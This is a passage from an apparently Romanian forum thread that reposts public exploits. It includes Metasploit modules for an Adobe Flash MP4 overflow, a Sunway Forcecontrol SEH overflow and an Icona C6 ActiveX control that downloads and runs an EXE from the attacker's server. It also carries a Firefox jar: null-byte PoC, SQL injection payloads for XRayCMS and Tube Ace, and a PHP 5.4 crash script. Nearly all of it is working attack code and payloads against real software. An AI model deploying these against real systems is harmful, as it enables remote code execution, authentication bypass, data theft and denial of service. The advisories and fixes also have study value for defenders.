        myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
        mp4_uri = "http://#{myhost}:#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.mp4"
        swf_uri = "#{datastore['SWF_PLAYER_URI']}?autostart=true?=video.jpg&file=#{mp4_uri}"
        html = %Q|
    <html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}">
    <param name="movie" value="#{swf_uri}">
    </object>
    </body>
    </html>
    |
        # NOTE(review): strips two leading tabs per line; in this listing the
        # template is space-indented, so this may be a no-op — confirm against
        # the original file.
        html = html.gsub(/^\t\t/, '')
        print_status("Sending html to #{cli.peerhost}:#{cli.peerport}...")
        send_response(cli, html, {'Content-Type'=>'text/html'})
      end

      # Builds the MP4 once, then starts the HTTP server (super).
      #
      # @return [void]
      def exploit
        @mp4 = create_mp4
        super
      end

      # Assembles the trigger MP4: an ftyp box, a tiny mdat box and a moov tree
      # whose avc1 sample entry carries an avcC record with an SPS containing
      # 35 repetitions of `cycle` (presumably the offset_for_ref_frame entries
      # named in the Description).
      #
      # Several box size fields end in a printable byte that is written as the
      # first character of the following string literal: "\x00\x00\x00" +
      # "lmvhd" is size 0x6c then type "mvhd", "\x00\x00\x02" + "rmdia" is size
      # 0x272 then "mdia", and the "p" before "ctts" is the low byte of that
      # box's size. Keep that in mind when editing the layout.
      #
      # @return [String] the binary MP4 contents
      def create_mp4
        ftypAtom = "\x00\x00\x00\x20" #Size
        ftypAtom << "ftypisom"
        ftypAtom << "\x00\x00\x02\x00"
        ftypAtom << "isomiso2avc1mp41"
        mdatAtom = "\x00\x00\x00\x10" #Size
        mdatAtom << "mdat"
        mdatAtom << "\x00\x00\x02\x8B\x06\x05\xFF\xFF"
        moovAtom1 = "\x00\x00\x08\x83" #Size
        moovAtom1 << "moov" #Move header box header
        moovAtom1 << "\x00\x00\x00"
        moovAtom1 << "lmvhd" # Type
        moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
        moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
        moovAtom1 << "\x00\x00\x03\xE8" # Time scale
        moovAtom1 << "\x00\x00\x2F\x80" # Duration
        moovAtom1 << "\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x02\xFA"
        moovAtom1 << "trak" # Track box header
        moovAtom1 << "\x00\x00\x00\x5C"
        moovAtom1 << "tkhd"
        moovAtom1 << "\x00\x00\x00\x0F"
        moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
        moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x2E\xE0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "\x00\x00\x00\x00\x40\x00\x00\x00\x01\x42\x00\x00\x01\x42\x00\x00\x00\x00\x02"
        moovAtom1 << "rmdia" # low size byte 'r' followed by the mdia type
        moovAtom1 << "\x00\x00\x00\x20" # Size
        moovAtom1 << "mdhd" # Media header box
        moovAtom1 << "\x00\x00\x00\x00" # Version/Flags
        moovAtom1 << "\x7C\x25\xB0\x80\x7C\x25\xB0\x80" # Creation time
        moovAtom1 << "\x00\x00\x00\x01" # Time scale
        moovAtom1 << "\x00\x00\x00\x0C" # Duration
        moovAtom1 << "\x55\xC4\x00\x00"
        moovAtom1 << "\x00\x00\x00\x2D" # Size
        moovAtom1 << "hdlr" # Handler Reference header
        moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "vide" # Handler type
        moovAtom1 << "\x00\x00\x00\x00\x00"
        moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "VideoHandler" # Handler name
        moovAtom1 << "\x00\x00\x00\x02\x1D" # name terminator, then minf size
        moovAtom1 << "minf"
        moovAtom1 << "\x00\x00\x00\x14"
        moovAtom1 << "vmhd"
        moovAtom1 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24"
        moovAtom1 << "dinf" # Data information box header
        moovAtom1 << "\x00\x00\x00\x1c"
        moovAtom1 << "dref" # Data reference box
        moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
        moovAtom1 << "\x00\x00\x00\x0C" # Size
        moovAtom1 << "url " # Data entry URL box
        moovAtom1 << "\x00\x00\x00\x01" # Location / version / flags
        moovAtom1 << "\x00\x00\x09\xDD" # Size
        moovAtom1 << "stbl"
        moovAtom1 << "\x00\x00\x08\x99"
        moovAtom1 << "stsd"
        moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01"
        moovAtom1 << "\x00\x00\x08\x89" # Size
        moovAtom1 << "avc1"
        moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "\x01\x42" # Width
        moovAtom1 << "\x01\x42" # Height
        moovAtom1 << "\x00\x48\x00\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        moovAtom1 << "\x18" # Depth
        moovAtom1 << "\xFF\xFF"
        moovAtom1 << "\x00\x00\x08\x33" # Size
        moovAtom1 << "avcC"
        moovAtom1 << "\x01" # Config version
        moovAtom1 << "\x64" # Avc profile indication
        moovAtom1 << "\x00" # Compatibility
        moovAtom1 << "\x15" # Avc level indication
        moovAtom1 << "\xFF\xE1"
        # Although the fields have different values, they all become 0x0c0c0c0c
        # in memory.
        cycle = "\x00\x00\x00"
        cycle << "\x30\x30\x30\x30" #6th
        cycle << "\x00\x00\x00"
        cycle << "\x18\x18\x18\x18" #7th
        cycle << "\x00\x00\x00"
        cycle << "\x0c\x0c\x0c\x0c" #8th
        cycle << "\x00\x00\x00"
        cycle << "\x06\x06\x06\x06" #1st
        cycle << "\x00\x00\x00"
        cycle << "\x03\x03\x03\x03"
        cycle << "\x00\x00\x00\x01\x81\x81\x81\x80\x00\x00\x00"
        cycle << "\xc0\xc0\xc0\xc0" # 4th
        cycle << "\x00\x00\x00"
        cycle << "\x60\x60\x60\x60"
        # SPS NAL unit: fixed header bytes, then the repeated cycle block.
        spsunit = "\x08\x1A\x67\x70\x34\x32\x74\x70\x00\x00\xAF\x88\x88\x84\x00\x00\x03\x00\x04\x00\x00\x03\x00\x3F\xFF\xFF\xFF\xFF\xFF"
        spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
        spsunit << "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFC"
        spsunit << cycle * 35
        spsunit << "\x00\x00\x00\x30\x30\x03\x03\x03\x03\x00\x00\x00\xB2\x2C"
        # Remaining sample-table boxes: stts, stss, ctts, stsc, stsz, stco.
        moovAtom2 = "\x00\x00\x00\x18"
        moovAtom2 << "stts"
        moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x0C\x00\x00\x00\x01"
        moovAtom2 << "\x00\x00\x00\x14"
        moovAtom2 << "stss"
        moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
        moovAtom2 << "pctts" # low size byte 'p' followed by the ctts type
        moovAtom2 << "\x00\x00\x00\x00\x00\x00"
        moovAtom2 << "\x00\x0C\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
        moovAtom2 << "\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x02"
        moovAtom2 << "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x01\x00"
        moovAtom2 << "\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x02"
        moovAtom2 << "\x00\x00\x00\x1C"
        moovAtom2 << "stsc"
        moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01"
        moovAtom2 << "\x00\x00\x00\x44"
        moovAtom2 << "stsz"
        moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
        moovAtom2 << "\x0C\x00\x00\x2F\x8D\x00\x00\x0C\xFE\x00\x00\x04\x42\x00\x00\x0B\x20\x00\x00\x04\x58\x00\x00\x07\x19\x00\x00\x07"
        moovAtom2 << "\x63\x00\x00\x02\xD6\x00\x00\x03\xC1\x00\x00\x0A\xDF\x00\x00\x04\x9B\x00\x00\x09\x39"
        moovAtom2 << "\x00\x00\x00\x40"
        moovAtom2 << "stco"
        moovAtom2 << "\x00\x00\x00\x00\x00\x00\x00\x0C\x00\x00\x00\x30\x00\x00\x2F\xBD\x00\x00\x3D\x8A\x00\x00\x48\x19\x00\x00\x5A\xF4"
        moovAtom2 << "\x00\x00\x66\x1F\x00\x00\x73\xEA\x00\x00\x82\x32\x00\x00\x8A\xFA\x00\x00\x95\x51\x00\x00\xA7\x16\x00\x00\xB1\xE5"
        moovAtom = moovAtom1 + spsunit + moovAtom2
        m = ftypAtom + mdatAtom + moovAtom
        return m
      end
    end
    =begin
    C:\WINDOWS\system32\Macromed\Flash\Flash10u.ocx
    Flash10u+0x5b4e8:
    Missing image name, possible paged-out or corrupt data.
    1f06b4e8 8901 mov dword ptr [ecx],eax ds:0023:020c0000=00905a4d
    0:008> !exchain
    020bfdfc: <Unloaded_ud.drv>+c0c0c0b (0c0c0c0c)
    ECX holds 0x0c0c0c0c at the time of the crash, and the register dump below shows EIP at the same value, i.e. execution has already been redirected into the sprayed 0x0c0c0c0c region (the !exchain output above lists that address as the SEH handler):
    0:008> r
    eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000
    eip=0c0c0c0c esp=020befa8 ebp=020befc8 iopl=0 nv up ei pl zr na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050246
    <Unloaded_ud.drv>+0xc0c0c0b:
    0c0c0c0c ?? ???
    Example of SWF player URI:
    http://www.jeroenwijering.com/embed/mediaplayer.swf
    To-do:
    IE 8 target
    =end

    Sursa: Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow

  7. The_Arhitect Nu te supara ca iti zic, Copy paste stie sa faca multa lume.

    In primul si in primul rand, daca te uiti tu mai bine, fisierul tau este un script php ... Care ce face ? Local DOS ? HAHAHA ... ASTA POTI SA FACI SI cu un while();

    Daca nu am dreptate lumineaza-ma ! Te rog !

    Altele apar pe parcurs.

  8. mozilla firefox <= 10.0 local null byte bypass file check execution exploit

    <!-- [+] mozilla firefox <= 10.0 local null byte bypass file check execution exploit -->
    <!-- -->
    <!-- Vuln risk level: Medium -->
    <!-- Author: Todor Donev -->
    <!-- Author mail: todor.donev@@gmail.com -->
    <!-- -->
    <!-- Description: Allows local attackers to bypass file type checks and possibly execute programs via a jar: -->
    <!-- URI with a dangerous extension.-->
    <!-- See http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3285 for more -->
    <!-- -->
    <!-- Simple PoC for Mozilla Firefox 10.0, tested on Windows XP SP3 EN. It targets a file:// path inside the default install directory (C:\Program Files\Mozilla Firefox\omni.ja), so it only works locally and only with that install path. -->
    <!-- -->
    <!-- Greetz Tsvetelina Emirska again.. =) -->
    <!-- -->
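    <html>
    <!-- The form auto-submits to a jar: URI pointing into Firefox's own omni.ja.
         The %00 after "browser.xpt" is a null byte meant to truncate the entry name,
         presumably so the extension check sees ".html" while the entry actually
         opened is browser.xpt (TODO: confirm against the CVE-2007-3285 write-up).
         Fixes vs. the original: the stray ";" after the action attribute (which
         browsers parsed as a bogus attribute) is gone and onload is quoted. -->
    <body onload="javascript:document.form.submit()">
    <form action="jar:file:///C:/Program%20Files/Mozilla%20Firefox/omni.ja!/components/browser.xpt%00.html" method="GET" name="form">
    </form>
    </body>
    </html>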
    <!-- STOP ACTA !!! STOP PIPA !!! STOP SOPA -->

    Sursa: mozilla firefox <= 10.0 local null byte bypass file check execution exploit

  9. XRayCMS 1.1.1 SQL Injection Vulnerability

    # Exploit Title: XRayCMS 1.1.1 SQL Injection Vulnerability
    # Date: 2/5/2012
    # Author: chap0
    # Software Link: http://sourceforge.net/projects/xraycms/files/latest/download
    # Version: 1.1.1
    # Tested on: Ubuntu
    XRay CMS is vulnerable to a SQL injection attack which allows
    authentication bypass into the admin account. If a malicious
    user supplies ' or 1=1# in the application's user name field,
    they will be logged in as the application's admin account.
    Jan 29, 2012 – Contacted Vendor No Response
    Feb 05, 2012 – Public Disclosure
    Since the vendor did not reply we attempted to create our own
    fix for this issue. The vulnerability exists in "login2.php"
    on lines 20 and 21, where the POST values are taken unescaped:
    17 if(!isset($_POST['username'])) header("Location: login.php?error_username");
    18 if(!isset($_POST['password'])) header("Location: login.php?error_password");
    19
    20 $user = $_POST['username'];
    21 $pass = $_POST['password'];
    If lines 20 and 21 are changed to:
    $user = mysql_real_escape_string($_POST['username']);
    $pass = mysql_real_escape_string($_POST['password']);
    This stops the quote-based injection in the user name field, but only as a stop-gap: mysql_real_escape_string() requires an open mysql_* connection and only protects values placed inside quoted string literals, and the mysql_* extension is deprecated. The robust fix is to use prepared statements (mysqli or PDO) so the credentials are never interpolated into the query text at all.

    Sursa: XRayCMS 1.1.1 SQL Injection Vulnerability

  10. Tube Ace(Adult PHP Tube Script) SQL Injection

    # Exploit Title: Tube Ace(Adult PHP Tube Script) SQL Injection
    # Date: 05/02/2012
    # Author: Daniel Godoy
    # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
    # Author Web: www.delincuentedigital.com.ar
    # Software: Tube Ace
    # http://www.tubeace.com
    # Tested on: Linux
    # Dork: "?viewStandard=0"
     
    [Comment]
    Greetz: Hernan Jais, Alfonso Cuevas, SPEED, Sensei, Incid3nt,
    Maximiliano Soler
        Sunplace, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0,
    InyeXion
        her0, r0dr1 y demas user de RemoteExecution
        www.remoteexecution.info www.remoteexcution.com.ar
        #RemoteExecution Hacking Group
    [PoC] (MySQL error-based injection: the COUNT(*) ... GROUP BY FLOOR(RAND(0)*2) subquery forces a duplicate-key error, and the CONCAT'd result of the injected CASE expression is carried back inside that error message)
    http://localhost/mobile/search/?q=[SQL Injection]
    http://localhost/mobile/search/?q=1') AND (SELECT 9602 FROM(SELECT
    COUNT(*),CONCAT(CHAR(58,109,111,110,58),(SELECT (CASE WHEN
    (9602=9602) THEN 1 ELSE 0
    END)),CHAR(58,107,109,109,58),FLOOR(RAND(0)*2))x FROM
    information_schema.tables GROUP BY x)a) AND ('LMEk'='LMEk&channel=
    [DEMO]
    http://server/mobile/search/?q=1%27%29%20AND%20%28SELECT%209602%20FROM%28SELECT%20COUNT%28*%29,CONCAT%28CHAR%2858,109,111,110,58%29,%28SELECT%20%28CASE%20WHEN%20%289602=9602%29%20THEN%201%20ELSE%200%20END%29%29,CHAR%2858,107,109,109,58%29,FLOOR%28RAND%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29%20AND%20%28%27LMEk%27=%27LMEk&channel=

    Sursa: Tube Ace(Adult PHP Tube Script) SQL Injection

  11. PHP 5.4.0RC6 64bit Denial of Service

    <?php
    /*
     * Emits a raw HTTP POST (multipart/form-data) that makes PHP 5.4.0RC6 on
     * 64-bit call a bogus function pointer, 0x0111111111111111, through a faked
     * hash-table structure (see the crash transcript: ht->pDestructor(p->pData),
     * "callq *%rdx" with rdx = 0x111111111111111).
     * (C) Copyright 2012 Stefan Esser
     *
     * Notes from the original author:
     *  - PHP 5.3.9 requires knowing the address of a writable region filled with NULLs.
     *  - 32-bit builds need a fake 32-bit HashTable instead of the 64-bit layout below.
     *  - Because the bug also leaks memory addresses, ASLR can be "semi"-defeated:
     *    roughly 4000 tries = 4000 requests = 4000 crashes are enough to brute-force
     *    code addresses and execute arbitrary code despite ASLR/NX. A better exploit
     *    may be possible after deeper research and heap massage.
     *  - This specific attack only works without the Suhosin patch (-> RHEL, CentOS).
     *
     * Layout of the first form field as produced by the original loop bounds
     * (127 bytes in total):
     *   byte    0      : 0x10
     *   bytes   1..55  : 0x00            (55 bytes)
     *   bytes  56..62  : 0x11            (7 bytes)
     *   byte   63      : 0x01            -> little-endian 0x0111111111111111
     *   bytes  64..126 : 0x00            (63 bytes)
     * The 1000 "aaaN" fields and the trailing "xxx[]" / "xxx[0]" fields are the
     * rest of the original trigger sequence and are reproduced unchanged.
     *
     * Each request crashes the worker that handles it: this is a denial-of-service
     * / crash reproducer, so only point it at an instance you own.
     *
     * (gdb) c
     * Continuing.
     * Program received signal SIGSEGV, Segmentation fault.
     * 0x00007fd959ca5f9d in _zend_hash_index_update_or_next_insert (ht=0x7fd96480d508, h=0, pData=0x7fff75c47bd0, nDataSize=8, pDest=0x7fff75c47bc8, flag=1,
     * __zend_filename=0x7fd95a061b68 "/home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.h", __zend_lineno=350)
     * at /home/user/Downloads/php-5.4.0RC6/Zend/zend_hash.c:398
     * 398 ht->pDestructor(p->pData);
     * (gdb) i r
     * rax 0x7fd9583352a0 140571464389280
     * rbx 0x0 0
     * rcx 0x8 8
     * rdx 0x111111111111111 76861433640456465
     * rsi 0x7fd95a077b08 140571495070472
     * rdi 0x7fd9583352a0 140571464389280
     * rbp 0x7fff75c47ae0 0x7fff75c47ae0
     * rsp 0x7fff75c47a80 0x7fff75c47a80
     * r8 0x7fff75c47bc8 140735169199048
     * r9 0x1 1
     * r10 0x6238396661373430 7077469926293189680
     * r11 0x7fd962f4c8e0 140571644840160
     * r12 0x7fd966b91da8 140571708038568
     * r13 0x0 0
     * r14 0xffffffff00000001 -4294967295
     * r15 0x7fd964b10538 140571673953592
     * rip 0x7fd959ca5f9d 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>
     * eflags 0x10206 [ PF IF RF ]
     * cs 0x33 51
     * ss 0x2b 43
     * ds 0x0 0
     * es 0x0 0
     * fs 0x0 0
     * gs 0x0 0
     * (gdb) x/5i $rip
     * => 0x7fd959ca5f9d <_zend_hash_index_update_or_next_insert+477>: callq *%rdx
     * 0x7fd959ca5f9f <_zend_hash_index_update_or_next_insert+479>: cmpl $0x8,-0x3c(%rbp)
     * 0x7fd959ca5fa3 <_zend_hash_index_update_or_next_insert+483>: jne 0x7fd959ca6031 <_zend_hash_index_update_or_next_insert+625>
     * 0x7fd959ca5fa9 <_zend_hash_index_update_or_next_insert+489>: mov -0x18(%rbp),%rax
     * 0x7fd959ca5fad <_zend_hash_index_update_or_next_insert+493>: mov 0x10(%rax),%rax
     * (gdb)
     */
    $boundary = md5(microtime());
    $varname  = "xxx";

    // Faked 64-bit structure carried in the first field (see layout above).
    $fake  = chr(16);
    $fake .= str_repeat(chr(0), 55);
    $fake .= str_repeat("\x11", 7);
    $fake .= chr(1);
    $fake .= str_repeat(chr(0), 63);

    $payload  = "--$boundary\n";
    $payload .= 'Content-Disposition: form-data; name="'.$varname.'"'."\n\n";
    $payload .= $fake."\n";

    // Filler fields aaa0 .. aaa999.
    for ($n = 0; $n < 1000; $n++) {
        $payload .= "--$boundary\n";
        $payload .= 'Content-Disposition: form-data; name="aaa'.$n.'"'."\n\n";
        $payload .= "aaa\n";
    }

    // Array-style fields on the same variable name trigger the bogus call.
    foreach (array($varname.'[]', $varname.'[0]') as $field) {
        $payload .= "--$boundary\n";
        $payload .= 'Content-Disposition: form-data; name="'.$field.'"'."\n\n";
        $payload .= "aaa\n";
    }
    $payload .= "--$boundary--\n";

    $request  = "POST /index.php HTTP/1.0\n";
    $request .= "Content-Type: multipart/form-data; boundary=$boundary\n";
    $request .= "Content-Length: ".strlen($payload)."\n";
    $request .= "\n";
    $request .= $payload;
    echo $request;
    ?>

    Sursa: PHP 5.4.0RC6 64bit Denial of Service

  12. PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow

    From:             cataphract
    Operating system: Any
    PHP version: 5.4SVN-2012-02-03 (SVN)
    Package: Reproducible crash
    Bug Type: Bug
    Bug description:Buffer overflow on htmlspecialchars/entities with $double=false
    Description:
    ------------
    Long entities can cause a buffer overflow because the conversion loop only
    guarantees 40 bytes of free output space up front; a long run of characters that
    each expand to a multi-byte entity (the test below uses `"`, which becomes the
    6-byte `&quot;`) with $double_encode=false can write past the end of the buffer.
    Test script:
    ---------------
    <?php
    // Reproducer: a long run of '"' characters, each expanded by htmlspecialchars()
    // to the 6-byte entity &quot;, with $double_encode=false (4th argument).
    // Expected on a fixed build: the escaped string; on the affected build: a crash.
    echo
    htmlspecialchars('"""""""""""""""""""""""""""""""""""""""""""""',
    ENT_QUOTES, 'UTF-8', false), "\n";

    Sursa: PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow

  13. Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    require 'msf/core'
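    class Metasploit3 < Msf::Exploit::Remote
      Rank = GreatRanking

      include Msf::Exploit::Remote::Tcp
      include Msf::Exploit::Remote::Seh

      # Layout of the 65535-byte request, taken from the original exploit:
      # a fixed preamble at offset 0, the SEH record at 293, a 20-byte NOP
      # sled at 301, the payload from 321 onwards and a CRLF in the last two
      # bytes. Everything else is random upper-case filler.
      PACKET_SIZE    = 65535
      SEH_OFFSET     = 293
      NOP_OFFSET     = 301
      NOP_LENGTH     = 20
      PAYLOAD_OFFSET = 321
      FOOTER         = "\r\n"
      FOOTER_OFFSET  = PACKET_SIZE - FOOTER.length

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57',
          'Description'    => %q{
            This module exploits a stack based buffer overflow found in the SNMP
            NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. The overflow is
            triggered when sending an overly long string to the listening service
            on port 2001.
          },
          'Author'         =>
            [
              'Luigi Auriemma', # original discovery
              'Rinat Ziyayev',
              'James Fitts'
            ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              [ 'BID', '49747' ],
              [ 'URL', 'http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt' ],
            ],
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'thread',
            },
          'Privileged'     => true,
          'Payload'        =>
            {
              # Largest payload that still fits between the payload offset and
              # the CRLF footer; without it an oversized payload would be
              # overwritten by (or spill past) the footer.
              'Space'       => FOOTER_OFFSET - PAYLOAD_OFFSET,
              # Boolean, not the string 'true' (which only worked because any
              # non-nil value is truthy in Ruby).
              'DisableNops' => true,
              'BadChars'    => "\x0a\x0d\xae",
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              [
                # pop/pop/ret in ComDll.dll
                'Windows', { 'Ret' => 0x100022c4 }
              ],
            ],
          'DefaultTarget'  => 0,
          'DisclosureDate' => 'Sep 22 2011'))

        register_options(
          [
            Opt::RPORT(2001)
          ], self.class)
      end

      # Builds the malicious request and sends it in a single write.
      #
      # The whole buffer is assembled before connect so that a failure in
      # payload generation cannot leave an open socket behind (the original
      # connected first and built the packet afterwards).
      def exploit
        header = "\xeb\x50\xeb\x50"   # fixed preamble from the original PoC
        header << "\x57\x00"         # packet type / opcode 0x57
        header << "\xff\xff\x00\x00"
        header << "\x01\x00"
        header << "\xff"

        packet = rand_text_alpha_upper(PACKET_SIZE)
        packet[0, header.length] = header
        packet[SEH_OFFSET, 8] = generate_seh_record(target.ret)
        packet[NOP_OFFSET, NOP_LENGTH] = make_nops(NOP_LENGTH)
        packet[PAYLOAD_OFFSET, payload.encoded.length] = payload.encoded
        packet[FOOTER_OFFSET, FOOTER.length] = FOOTER

        print_status("Trying target %s..." % target.name)
        connect
        sock.put(packet)
        handler
        disconnect
      end
    end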

    Sursa: Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57

  14. Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    require 'msf/core'
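    class Metasploit3 < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpServer::HTML
      include Msf::Exploit::EXE

      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute',
          'Description'    => %q{
            This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The
            vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The
            insecure control can be abused to download and execute arbitrary files in the context of
            the currently logged-on user.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Nine:Situations:Group::SnoopyAssault', # Vulnerability discovery and exploit
              'juan vazquez'                         # metasploit module
            ],
          'References'     =>
            [
              [ 'CVE', '2008-2551' ],
              [ 'OSVDB', '45960' ],
              [ 'BID', '29519' ],
              [ 'URL', 'http://retrogod.altervista.org/9sg_c6_download_exec.html' ],
            ],
          'DefaultOptions' =>
            {
              'ExitFunction'         => "none",
              'InitialAutoRunScript' => 'migrate -f'
            },
          'Payload'        =>
            {
              'Space'           => 2048,
              'StackAdjustment' => -3500,
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              [ 'Automatic', { } ],
            ],
          'DisclosureDate' => 'Jun 03 2008',
          'DefaultTarget'  => 0,
          'Privileged'     => false))
      end

      # Keep this module out of automatic browser-autopwn selection.
      def autofilter
        false
      end

      def check_dependencies
        use_zlib
      end

      # Serves two things from the same resource: the landing page that embeds
      # the vulnerable control, and - when the requested URI contains
      # @payload_rand - the EXE the control is told to fetch and run.
      #
      # @param cli     the connected client
      # @param request the incoming HTTP request
      def on_request_uri(cli, request)
        # Only IE can instantiate the control; "File Session" is the User-Agent
        # the control itself sends when it downloads propDownloadUrl.
        agent = request.headers['User-Agent'].to_s
        unless agent =~ /MSIE \d\.\d|File Session/
          print_error("Target not supported: #{cli.peerhost}:#{cli.peerport} (#{agent})")
          return
        end

        # When bound to 0.0.0.0 the advertised host must be an address the
        # client can reach, i.e. the one it connected through.
        srvhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
        # Interpolation rather than String#+ so an Integer SRVPORT cannot raise
        # TypeError; get_resource already carries the leading slash.
        payload_url = "http://#{srvhost}:#{datastore['SRVPORT']}#{get_resource}/#{@payload_rand}"

        # Second stage: the control is fetching the EXE.
        # @payload_rand is alphabetic only, so a plain substring test is enough.
        if request.uri.include?(@payload_rand)
          p = regenerate_payload(cli)
          return if p.nil?
          data = generate_payload_exe({ :code => p.encoded })
          print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
          send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
          return
        end

        # First stage: the control downloads whatever propDownloadUrl points at
        # and, because propPostDownloadAction is "run", executes it. That is
        # the vulnerability this module abuses.
        exe = rand_text_alpha(rand(5) + 1)
        content = %Q|
        <html>
        <object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
        <param name="propProgressBackground" value="#bccee8">
        <param name="propTextBackground" value="#f7f8fc">
        <param name="propBarColor" value="#df0203">
        <param name="propTextColor" value="#000000">
        <param name="propWidth" value="0">
        <param name="propHeight" value="0">
        <param name="propDownloadUrl" value="#{payload_url}/#{exe}.exe">
        <param name="propPostDownloadAction" value="run">
        <param name="propInstallCompleteUrl" value="">
        <param name="propBrowserRedirectUrl" value="">
        <param name="propVerbose" value="0">
        <param name="propInterrupt" value="0">
        </OBJECT>
        </html>
        |
        print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
        send_response_html(cli, content)
        handler(cli)
      end

      # Picks the per-run random path component the EXE is served under, then
      # starts the HTTP server.
      def exploit
        @payload_rand = rand_text_alpha(rand(5) + 5)
        super
      end
    end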

    Sursa: Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute

  15. swDesk Multiple Vulnerabilities

    #
